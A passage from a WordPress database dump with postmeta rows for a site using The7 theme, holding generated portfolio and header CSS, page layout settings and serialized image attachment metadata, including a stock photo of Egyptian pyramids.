0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: 30px;\r\n  grid-column-gap: 30px;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: 15px;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(3,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: 30px;\r\n  grid-row-gap: 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 33.333333333333%;\r\n  padding: 15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(33.333333333333%) * 2;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: 0px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(3,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 33.333333333333%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(33.333333333333%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(2,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 50%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browse'),
(19826,3066,'_the7_imported_item','software-company'),
(19828,3066,'_dt_microsite_primary_menu','5'),
(19829,3066,'_dt_microsite_split_left_menu','5'),
(19830,3066,'_dt_microsite_split_right_menu','5'),
(19831,3066,'_dt_microsite_mobile_menu','5'),
(19832,3066,'_dt_page_overrides_right_margin',''),
(19833,3066,'_dt_page_overrides_left_margin',''),
(19834,3066,'_dt_mobile_page_padding_top',''),
(19835,3066,'_dt_mobile_page_padding_right',''),
(19836,3066,'_dt_mobile_page_padding_bottom',''),
(19837,3066,'_dt_mobile_page_padding_left',''),
(19839,3066,'_dt_fancy_header_layout_heading',''),
(19840,3066,'_dt_fancy_header_title_aligment','center'),
(19841,3066,'_dt_fancy_header_height','550'),
(19842,3066,'_dt_fancy_header_padding-top','200px'),
(19843,3066,'_dt_fancy_header_padding-bottom','0px'),
(19844,3066,'_dt_fancy_header_breadcrumbs_heading',''),
(19845,3066,'_dt_fancy_header_breadcrumbs','disabled'),
(19846,3066,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(19847,3066,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(19848,3066,'_dt_fancy_header_title_heading',''),
(19849,3066,'_dt_fancy_header_title_mode','custom'),
(19850,3066,'_dt_fancy_header_title',''),
(19851,3066,'_dt_fancy_header_title_font_size','50'),
(19852,3066,'_dt_fancy_header_title_line_height','75'),
(19853,3066,'_dt_fancy_header_text_transform','capitalize'),
(19854,3066,'_dt_fancy_header_title_color_mode','color'),
(19855,3066,'_dt_fancy_header_title_color','#ffffff'),
(19856,3066,'_dt_fancy_header_subtitle_heading',''),
(19857,3066,'_dt_fancy_header_subtitle',''),
(19858,3066,'_dt_fancy_header_subtitle_font_size','40'),
(19859,3066,'_dt_fancy_header_subtitle_line_height','26'),
(19860,3066,'_dt_fancy_header_subtitle_text_transform','none'),
(19861,3066,'_dt_fancy_header_subtitle_color_mode','color'),
(19862,3066,'_dt_fancy_header_subtitle_color','#ffffff'),
(19863,3066,'_dt_fancy_header_bg_heading',''),
(19864,3066,'_dt_fancy_header_bg_color','#222222'),
(19865,3066,'_dt_fancy_header_bg_image_origin','featured_image'),
(19866,3066,'_dt_fancy_header_bg_image','a:0:{}'),
(19867,3066,'_dt_fancy_header_bg_repeat','no-repeat'),
(19868,3066,'_dt_fancy_header_bg_position_x','center'),
(19869,3066,'_dt_fancy_header_bg_position_y','center'),
(19870,3066,'_dt_fancy_header_bg_fullscreen','1'),
(19871,3066,'_dt_fancy_header_bg_overlay','0'),
(19872,3066,'_dt_fancy_header_overlay_color','#000'),
(19873,3066,'_dt_fancy_header_bg_overlay_opacity','50'),
(19874,3066,'_dt_fancy_header_scroll_effect','default'),
(19875,3066,'_dt_fancy_header_bg_parallax','0.5'),
(19876,3066,'_dt_fancy_header_responsiveness_heading',''),
(19877,3066,'_dt_fancy_header_responsiveness','enabled'),
(19878,3066,'_dt_fancy_header_responsiveness_switch','778px'),
(19879,3066,'_dt_fancy_header_responsive_height','20'),
(19880,3066,'_dt_fancy_header_responsive_font_size','33'),
(19881,3066,'_dt_fancy_header_responsive_title_line_height','26'),
(19882,3066,'_dt_fancy_header_responsive_subtitle_font_size','29'),
(19883,3066,'_dt_fancy_header_responsive_subtitle_line_height','26'),
(19884,3066,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(19885,3066,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/08/main_u7-4.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 550px;\n  padding-top: 200px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 75px;\n  color: #ffffff;\n  text-transform: capitalize;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 40px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 20px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 33px;\n    line-height: 26px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 29px;\n    line-height: 26px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(19886,3066,'_dp_original','2372'),
(19887,3066,'_edit_last','1'),
(19889,3066,'_edit_lock','1694875407:1'),
(19890,3068,'_wp_attached_file','2022/11/egyptian-pyramids.jpg'),
(19891,3068,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:29:\"2022/11/egyptian-pyramids.jpg\";s:8:\"filesize\";i:397962;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"egyptian-pyramids-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10084;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"egyptian-pyramids-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96664;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"egyptian-pyramids-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5818;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"egyptian-pyramids-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian Pyramids In Sand Desert And Clear Sky\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:45:{i:0;s:5:\"Cairo\";i:1;s:5:\"Egypt\";i:2;s:7:\"african\";i:3;s:7:\"ancient\";i:4;s:11:\"archaeology\";i:5;s:12:\"architecture\";i:6;s:10:\"attraction\";i:7;s:5:\"clear\";i:8;s:6:\"desert\";i:9;s:11:\"destination\";i:10;s:3:\"dry\";i:11;s:8:\"egyptian\";i:12;s:7:\"evening\";i:13;s:6:\"famous\";i:14;s:4:\"giza\";i:15;s:5:\"great\";i:16;s:4:\"heat\";i:17;s:10:\"historical\";i:18;s:7:\"history\";i:19;s:3:\"hot\";i:20;s:9:\"landscape\";i:21;s:8:\"monument\";i:22;s:7:\"morning\";i:23;s:10:\"necropolis\";i:24;s:3:\"old\";i:25;s:6:\"orange\";i:26;s:4:\"past\";i:27;s:7:\"pharaoh\";i:28;s:7:\"pyramid\";i:29;s:7:\"remains\";i:30;s:4:\"ruin\";i:31;s:4:\"sand\";i:32;s:4:\"site\";i:33;s:3:\"sky\";i:34;s:5:\"stone\";i:35;s:6:\"summer\";i:36;s:3:\"sun\";i:37;s:8:\"sunlight\";i:38;s:7:\"sunrise\";i:39;s:6:\"sunset\";i:40;s:4:\"tomb\";i:41;s:7:\"tourism\";i:42;s:6:\"travel\";i:43;s:6:\"unesco\";i:44;s:6:\"yellow\";}}}'),
(19976,3082,'_wp_attached_file','2022/11/2022-10-24_104116.jpg'),
(19977,3082,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:799;s:6:\"height\";i:452;s:4:\"file\";s:29:\"2022/11/2022-10-24_104116.jpg\";s:8:\"filesize\";i:122813;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"2022-10-24_104116-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12606;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"2022-10-24_104116-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6023;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"2022-10-24_104116-768x434.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62864;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19978,3095,'_wp_attached_file','2022/11/m2.jpg'),
(19979,3095,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1916;s:6:\"height\";i:629;s:4:\"file\";s:14:\"2022/11/m2.jpg\";s:8:\"filesize\";i:319007;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"m2-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9711;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"m2-1024x336.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79848;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7793;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"m2-768x252.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50349;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:15:\"m2-1536x504.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153281;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19980,3097,'_wp_attached_file','2022/11/m2-1.jpg'),
(19981,3097,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1916;s:6:\"height\";i:629;s:4:\"file\";s:16:\"2022/11/m2-1.jpg\";s:8:\"filesize\";i:319007;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"m2-1-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9711;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"m2-1-1024x336.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79848;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7793;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"m2-1-768x252.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50349;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:17:\"m2-1-1536x504.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153281;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19982,3098,'_wp_attached_file','2022/11/m2-2.jpg'),
(19983,3098,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1916;s:6:\"height\";i:629;s:4:\"file\";s:16:\"2022/11/m2-2.jpg\";s:8:\"filesize\";i:319007;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"m2-2-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9711;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"m2-2-1024x336.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79848;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7793;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"m2-2-768x252.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50349;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:17:\"m2-2-1536x504.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153281;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
